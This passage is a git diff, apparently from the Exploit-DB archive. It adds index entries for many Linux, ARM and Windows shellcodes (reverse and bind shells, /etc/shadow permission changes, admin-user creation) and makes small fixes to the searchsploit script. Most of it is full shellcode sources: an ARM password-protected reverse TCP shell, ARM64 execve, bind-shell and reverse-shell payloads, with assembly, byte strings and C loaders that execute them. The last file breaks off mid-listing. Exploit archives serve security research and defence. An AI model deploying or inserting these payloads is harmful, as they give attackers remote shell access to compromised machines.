+47052,shellcodes/arm/47052.c,"Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47053,shellcodes/arm/47053.c,"Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47054,shellcodes/arm/47054.c,"Linux/ARM64 - Egghunter (PWN!PWN!) + execve(_/bin/sh__ NULL_ NULL) + mprotect() Shellcode (88 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
+47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86
+47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64
+47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
+47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
+47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
+47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
+47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47296,shellcodes/linux/47296.c,"Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)",2019-08-20,antonio,shellcode,linux
+47352,shellcodes/linux_x86/47352.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)",2019-09-05,guly,shellcode,linux_x86
+47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86
+47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86
+47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm
+47511,shellcodes/linux/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux
+47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux
+47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux
+47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux
+47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux
+47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
+47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux
+47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux
+47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
+47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
+48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux
+48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
+48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
+48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
+48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
diff --git a/searchsploit b/searchsploit
index 895aca470..00d7c519b 100755
--- a/searchsploit
+++ b/searchsploit
@@ -88,7 +88,7 @@ function usage()
   echo "       --id                   Display the EDB-ID value rather than local path"
   echo "       --nmap     [file.xml]  Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml)"
   echo "                                Use \"-v\" (verbose) to try even more combinations"
-  echo "       --exclude=\"term\"       Remove values from results. By using \"|\" to separated you can chain multiple values"
+  echo "       --exclude=\"term\"       Remove values from results. By using \"|\" to separate, you can chain multiple values"
   echo "                                e.g. --exclude=\"term1|term2|term3\""
   echo ""
   echo "======="
@@ -309,11 +309,11 @@ function searchsploitout()
       echo "[i] $0 ${arg} ${tmp}" 1>&2
       out=$( bash "$0" ${arg} ${tmp} )
 
-      ## Are there too many result?
+      ## Are there too many results?
       lines=$( echo -e "${out}" | wc -l )
       if [[ "${lines}" -gt 100 ]]; then
         echo -e "[-] Skipping output: ${tmp}   (Too many results, 100+. You'll need to force a search: $0 ${arg} ${tmp})\n" 1>&2
-      ## Are there any result?
+      ## Are there any results?
       elif [[ "${lines}" -gt 5 ]]; then
         echo -e "${out}\n\n"
       ## If there's no results
@@ -337,11 +337,11 @@ function searchsploitout()
     echo "[i] $0 ${arg} ${software}" 1>&2
     out=$( bash "$0" ${arg} ${software} )
 
-    ## Are there too many result?
+    ## Are there too many results?
     lines=$( echo -e "${out}" | wc -l )
     if [[ "${lines}" -gt 100 ]]; then
       echo -e "[-] Skipping output: ${software}   (Too many results, 100+. You'll need to force a search: $0 ${arg} ${software})\n" 1>&2
-    ## Are there any result?
+    ## Are there any results?
     elif [[ "${lines}" -gt 5 ]]; then
       echo -e "${out}\n\n"
     fi
@@ -353,7 +353,7 @@ function searchsploitout()
 function nmapxml()
 {
   ## Feedback to the end user
-  echo -e "[i] Reading: '${FILE}'\n"
+  echo -e "[i] Reading: '${FILE}'\n" 1>&2
 
   ## Read in XMP (IP, name, service and version)
   xmllint --xpath '//address/@addr|//service/@name|//service/@product|//service/@version' "${FILE}" \
@@ -381,6 +381,7 @@ function nmapxml()
           ## We have a name, but no version (yet?)   e.g. dnsmasq
           echo "${software}"
           software="${input}"
+          echo "${software}"
           ;;
         "[VERSION]")
           software="${software} ${input}"
@@ -717,25 +718,25 @@ for (( i=0; i<${arraylength}; i++ )); do
     continue
   ## Method #1 - File itself
   elif [[ -f "$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/${files_array[${i}]}" ]]; then
-    echo "[i] Found (#1): $( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/${files_array[${i}]}"
-    echo "[i] To remove this message, please edit \"${rc_file}\" for \"${files_array[${i}]}\" (package_array: ${package_array[${i}]})"
+    echo "[i] Found (#1): $( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/${files_array[${i}]}" 1>&2
+    echo "[i] To remove this message, please edit \"${rc_file}\" for \"${files_array[${i}]}\" (package_array: ${package_array[${i}]})" 1>&2
+    echo 1>&2
     path_array[${i}]="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-    echo
   ## Method #2 - Symbolic link
   elif [[ -f "$( dirname "$( readlink "$0" )" )/${files_array[${i}]}" ]]; then
-    echo "[i] Found (#2): $( dirname "$( readlink "$0" )" )/${files_array[${i}]}"
-    echo "[i] To remove this message, please edit \"${rc_file}\" for \"${files_array[${i}]}\" (package_array: ${package_array[${i}]})"
+    echo "[i] Found (#2): $( dirname "$( readlink "$0" )" )/${files_array[${i}]}" 1>&2
+    echo "[i] To remove this message, please edit \"${rc_file}\" for \"${files_array[${i}]}\" (package_array: ${package_array[${i}]})" 1>&2
+    echo 1>&2
     path_array[${i}]="$( dirname "$( readlink "$0" )" )"
-    echo
   else
-    #echo "[!] Could not find: ${files}"
-    #echo "[i] To remove this message, please remove \"${files_array[${i}]}\" (package_array: ${package_array[${i}]}) from \"${rc_file}\""
+    #echo "[!] Could not find: ${files}" 1>&2
+    #echo "[i] To remove this message, please remove \"${files_array[${i}]}\" (package_array: ${package_array[${i}]}) from \"${rc_file}\"" 1>&2
+    #echo 1>&2
     unset "files_array[${i}]"
     unset "path_array[${i}]"
     unset "name_array[${i}]"
     unset "git_array[${i}]"
     unset "package_array[${i}]"
-    #echo
   fi
 done
 
@@ -761,7 +762,7 @@ if [[ "${XML}" -eq 1 ]]; then
   fi
 
   if [[ "${VERBOSE}" -ne 1 ]]; then
-    echo "[i] SearchSploit's XML mode (without verbose enabled).   To enable: ${progname} -v --xml..."
+    echo "[i] SearchSploit's XML mode (without verbose enabled).   To enable: ${progname} -v --xml..." 1>&2
   fi
 
   ## Do the magic
@@ -875,7 +876,7 @@ fi
 #-----------------------------------------------------------------------------#
 
 
-## If we are doing an exact match ("-e")? If so, do NOT check folder path (Implies "-t").
+## Are we are doing an exact match ("-e")? If so, do NOT check folder path (Implies "-t").
 if [[ "${EXACT}" -eq 1 ]]; then
   FILEPATH=0
 fi
@@ -906,7 +907,7 @@ arraylength="${#files_array[@]}"
 for (( i=0; i<${arraylength}; i++ )); do
   ## Search
   findresults "${files_array[${i}]}" "${path_array[${i}]}" "${name_array[${i}]}"
-  ## Print results if in JSON ("--json") or if there is any results
+  ## Print results if in JSON ("--json") or if there are any results
   if ([[ "${JSON}" -eq 1 ]] || [[ "${OUTPUT}" ]]); then
     printresults "${name_array[${i}]}" "${path_array[${i}]}"
   ## Summary if NOT JSON ("--json")
diff --git a/shellcodes/arm/46736.txt b/shellcodes/arm/46736.txt
new file mode 100644
index 000000000..02843cc85
--- /dev/null
+++ b/shellcodes/arm/46736.txt
@@ -0,0 +1,100 @@
+/*
+* Title:    Linux/ARM - Password-Protected Reverse TCP Shell
+* Date:     2019-04-20
+* Tested:   armv6 (32-bit Raspberry Pi I)
+* Author:   Alan Vivona - @syscall59 - medium.syscall59.com
+* Size:     100 bytes
+* No null bytes / Null-free
+*/
+
+.section .text
+.global _start
+_start:
+
+.arm
+    add   r3, pc, #1 // switch to thumb mode 
+    bx    r3
+
+.thumb
+
+// [281] socket(2, 1, 0) 
+    mov   r0, #2
+    mov   r1, #1
+    eor   r2, r2
+    mov   r7, #200
+    add   r7, #81
+    svc   #1
+mov   r10, r0 // save sockfd into r10
+
+// [283] connect(socketfd, target, addrlen) 
+    // socket fd is in r0 already
+    adr   r1, target
+    strb  r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
+    strb  r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
+    strb  r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
+    mov   r2, #16
+    add   r7, #2  // 281 + 2 = 283
+    svc   #1
+
+// [003] read(sourcefd, destbuffer, amount)
+    push  {r1}
+    mov   r1, sp
+    mov   r2, #4
+    mov   r7, #3
+    read_pass:
+        mov   r0, r10
+        svc   #1
+    check_pass:
+        ldr   r3, pass
+        ldr   r4, [r1]
+        eor   r3, r3, r4
+    bne read_pass
+
+// [063] dup2(sockfd, stdIO) 
+    mov   r1, #2  // r1 = 2 (stderr)
+    mov   r7, #63 // r7 = 63 (dup2)
+    loop_stdio:
+        mov   r0, r10 // r0 = saved sockfd 
+        svc   #1
+        sub   r1,#1
+    bpl loop_stdio    // loop while r3 >= 0 
+
+// [011] execve(command, 0, 0) 
+    adr   r0, command
+    eor   r2, r2
+    eor   r1, r1
+    strb  r2, [r0, #7]
+    mov   r7, #11 
+    svc   #1
+
+// 2 bytes aligment fix if needed needed (can't use a nop as it has a null byte)
+// align_bytes : .byte 0xff, 0xff
+
+target:
+    // The 0xff will be replaced with a null on runtime
+    .ascii "\x02\xff"   // Protocol: IPv4/TCP. 
+    
+    .ascii "\x11\x5c"   // Port : 4444 
+    
+    // The '255' will be replaced with a 0 on runtime
+    .byte 127,255,255,1 // IP: 127.0.0.1. 
+    
+command: .ascii "/bin/sh?"  // The '?' will be replaced with a null on runtime
+
+pass: .ascii "S59!"
+
+
+/* 
+    Compile, link & extract: 
+    
+        as ARM-reverse-shell.s -o ARM-reverse-shell.o
+        ld -N ARM-reverse-shell.o -o ARM-reverse-shell
+        objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump
+        hexdump -v -e '"\\""x" 1/1 "%02x" ""' ARM-reverse-shell.dump
+
+        \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x82\x46\x0e\xa1\x4a
+        \x70\x4a\x71\x8a\x71\x10\x22\x02\x37\x01\xdf\x02\xb4\x69\x46\x04\x22\x03\x27\x50\x46\x01\xdf\x0b\x4b
+        \x0c\x68\x63\x40\xf9\xd1\x02\x21\x3f\x27\x50\x46\x01\xdf\x01\x39\xfb\xd5\x04\xa0\x52\x40\x49\x40\xc2
+        \x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x7f\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x3f\x53\x35\x39\x21
+
+*/
\ No newline at end of file
diff --git a/shellcodes/arm/47048.c b/shellcodes/arm/47048.c
new file mode 100644
index 000000000..b789049cd
--- /dev/null
+++ b/shellcodes/arm/47048.c
@@ -0,0 +1,89 @@
+/*
+# Title:  Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat execve.s
+.section .text
+.global _start
+_start:
+    // execve("/bin/sh", NULL, NULL)
+    mov  x1, #0x622F            // x1 = 0x000000000000622F ("b/")
+    movk x1, #0x6E69, lsl #16   // x1 = 0x000000006E69622F ("nib/")
+    movk x1, #0x732F, lsl #32   // x1 = 0x0000732F6E69622F ("s/nib/")
+    movk x1, #0x68, lsl #48     // x1 = 0x0068732F6E69622F ("hs/nib/")
+    str  x1, [sp, #-8]!         // push x1
+    mov  x1, xzr                // args[1] = NULL
+    mov  x2, xzr                // args[2] = NULL
+    add  x0, sp, x1             // args[0] = pointer to "/bin/sh\0"
+    mov  x8, #221               // Systemcall Number = 221 (execve)
+    svc  #0x1337                // Invoke Systemcall
+ubuntu@ubuntu:~/works$ as -o execve.o execve.s && ld -o execve execve.o
+ubuntu@ubuntu:~/works$ ./execve 
+$ id
+uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev)
+$ exit
+ubuntu@ubuntu:~/works$ objdump -d ./execve
+
+./execve:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d28c45e1 	mov	x1, #0x622f                	// #25135
+  40007c:	f2adcd21 	movk	x1, #0x6e69, lsl #16
+  400080:	f2ce65e1 	movk	x1, #0x732f, lsl #32
+  400084:	f2e00d01 	movk	x1, #0x68, lsl #48
+  400088:	f81f8fe1 	str	x1, [sp,#-8]!
+  40008c:	aa1f03e1 	mov	x1, xzr
+  400090:	aa1f03e2 	mov	x2, xzr
+  400094:	8b2163e0 	add	x0, sp, x1
+  400098:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  40009c:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary execve execve.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve.bin && echo
+\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b"
+"\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/arm/47049.c b/shellcodes/arm/47049.c
new file mode 100644
index 000000000..b386eeea9
--- /dev/null
+++ b/shellcodes/arm/47049.c
@@ -0,0 +1,175 @@
+/*
+# Title:  Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat bindshell.s
+.section .text
+.global _start
+_start:
+    // s = socket(2, 1, 0)
+    mov  x8, #198
+    lsr  x1, x8, #7
+    lsl  x0, x1, #1
+    mov  x2, xzr
+    svc  #0x1337
+
+    // save s
+    mvn  x4, x0
+
+    // bind(s, &sockaddr, 16)
+    lsl  x1, x1, #1
+    movk x1, #0x5C11, lsl #16
+    str  x1, [sp, #-8]!
+    add  x1, sp, x2
+    mov  x2, #16
+    mov  x8, #200
+    svc  #0x1337
+
+    // listen(s, 2)
+    mvn  x0, x4
+    lsr  x1, x2, #3
+    mov  x8, #201
+    svc  #0x1337
+    mov  x5, x1
+
+    // a = accept(s, 0, 0)
+    mvn  x0, x4
+    mov  x1, xzr
+    mov  x2, xzr
+    mov  x8, #202
+    svc  #0x1337
+
+    // save a
+    mvn  x4, x0
+
+    lsl  x1, x5, #1
+
+dup3:
+    // dup3(s, 2, 0)
+    // dup3(s, 1, 0)
+    // dup3(s, 0, 0)
+    mvn  x0, x4
+    lsr  x1, x1, #1
+    mov  x2, xzr
+    mov  x8, #24
+    svc  #0x1337
+    mov  x10, xzr
+    cmp  x10, x1
+    bne  dup3
+
+    // execve("/bin/sh", 0, 0)
+    mov  x3, #0x622F
+    movk x3, #0x6E69, lsl #16
+    movk x3, #0x732F, lsl #32
+    movk x3, #0x68, lsl #48
+    str  x3, [sp, #-8]!
+    add  x0, sp, x1
+    mov  x8, #221
+    svc  #0x1337
+ubuntu@ubuntu:~/works$ as -o bindshell.o bindshell.s && ld -o bindshell bindshell.o
+ubuntu@ubuntu:~/works$ objdump -d ./bindshell
+
+./bindshell:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d28018c8 	mov	x8, #0xc6                  	// #198
+  40007c:	d347fd01 	lsr	x1, x8, #7
+  400080:	d37ff820 	lsl	x0, x1, #1
+  400084:	aa1f03e2 	mov	x2, xzr
+  400088:	d40266e1 	svc	#0x1337
+  40008c:	aa2003e4 	mvn	x4, x0
+  400090:	d37ff821 	lsl	x1, x1, #1
+  400094:	f2ab8221 	movk	x1, #0x5c11, lsl #16
+  400098:	f81f8fe1 	str	x1, [sp,#-8]!
+  40009c:	8b2263e1 	add	x1, sp, x2
+  4000a0:	d2800202 	mov	x2, #0x10                  	// #16
+  4000a4:	d2801908 	mov	x8, #0xc8                  	// #200
+  4000a8:	d40266e1 	svc	#0x1337
+  4000ac:	aa2403e0 	mvn	x0, x4
+  4000b0:	d343fc41 	lsr	x1, x2, #3
+  4000b4:	d2801928 	mov	x8, #0xc9                  	// #201
+  4000b8:	d40266e1 	svc	#0x1337
+  4000bc:	aa0103e5 	mov	x5, x1
+  4000c0:	aa2403e0 	mvn	x0, x4
+  4000c4:	aa1f03e1 	mov	x1, xzr
+  4000c8:	aa1f03e2 	mov	x2, xzr
+  4000cc:	d2801948 	mov	x8, #0xca                  	// #202
+  4000d0:	d40266e1 	svc	#0x1337
+  4000d4:	aa2003e4 	mvn	x4, x0
+  4000d8:	d37ff8a1 	lsl	x1, x5, #1
+
+00000000004000dc <dup3>:
+  4000dc:	aa2403e0 	mvn	x0, x4
+  4000e0:	d341fc21 	lsr	x1, x1, #1
+  4000e4:	aa1f03e2 	mov	x2, xzr
+  4000e8:	d2800308 	mov	x8, #0x18                  	// #24
+  4000ec:	d40266e1 	svc	#0x1337
+  4000f0:	aa1f03ea 	mov	x10, xzr
+  4000f4:	eb01015f 	cmp	x10, x1
+  4000f8:	54ffff21 	b.ne	4000dc <dup3>
+  4000fc:	d28c45e3 	mov	x3, #0x622f                	// #25135
+  400100:	f2adcd23 	movk	x3, #0x6e69, lsl #16
+  400104:	f2ce65e3 	movk	x3, #0x732f, lsl #32
+  400108:	f2e00d03 	movk	x3, #0x68, lsl #48
+  40010c:	f81f8fe3 	str	x3, [sp,#-8]!
+  400110:	8b2163e0 	add	x0, sp, x1
+  400114:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  400118:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary bindshell bindshell.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bindshell.bin && echo
+\xc8\x18\x80\xd2\x01\xfd\x47\xd3\x20\xf8\x7f\xd3\xe2\x03\x1f\xaa\xe1\x66\x02\xd4\xe4\x03\x20\xaa\x21\xf8\x7f\xd3\x21\x82\xab\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x02\x02\x80\xd2\x08\x19\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x24\xaa\x41\xfc\x43\xd3\x28\x19\x80\xd2\xe1\x66\x02\xd4\xe5\x03\x01\xaa\xe0\x03\x24\xaa\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xa1\xf8\x7f\xd3\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xc8\x18\x80\xd2\x01\xfd\x47\xd3\x20\xf8\x7f\xd3\xe2\x03\x1f\xaa"
+"\xe1\x66\x02\xd4\xe4\x03\x20\xaa\x21\xf8\x7f\xd3\x21\x82\xab\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x02\x02\x80\xd2\x08\x19\x80\xd2"
+"\xe1\x66\x02\xd4\xe0\x03\x24\xaa\x41\xfc\x43\xd3\x28\x19\x80\xd2"
+"\xe1\x66\x02\xd4\xe5\x03\x01\xaa\xe0\x03\x24\xaa\xe1\x03\x1f\xaa"
+"\xe2\x03\x1f\xaa\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa"
+"\xa1\xf8\x7f\xd3\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa"
+"\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb"
+"\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2"
+"\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2"
+"\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/arm/47050.c b/shellcodes/arm/47050.c
new file mode 100644
index 000000000..5c45a8f3d
--- /dev/null
+++ b/shellcodes/arm/47050.c
@@ -0,0 +1,148 @@
+/*
+# Title:  Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat revshell.s
+.section .text
+.global _start
+_start:
+    // s = socket(2, 1, 0)
+    mov  x8, #198
+    lsr  x1, x8, #7
+    lsl  x0, x1, #1
+    mov  x2, xzr
+    svc  #0x1337
+
+    // save s
+    mvn  x4, x0
+
+    // connect(s, &sockaddr, 16)
+    lsl  x1, x1, #1
+    movk x1, #0x5C11, lsl #16
+    movk x1, #0x7F, lsl #32
+    movk x1, #0x0100, lsl #48
+    str  x1, [sp, #-8]!
+    add  x1, sp, x2
+    mov  x2, #16
+    mov  x8, #203
+    svc  #0x1337
+
+    lsr  x1, x2, #2
+
+dup3:
+    // dup3(s, 2, 0)
+    // dup3(s, 1, 0)
+    // dup3(s, 0, 0)
+    mvn  x0, x4
+    lsr  x1, x1, #1
+    mov  x2, xzr
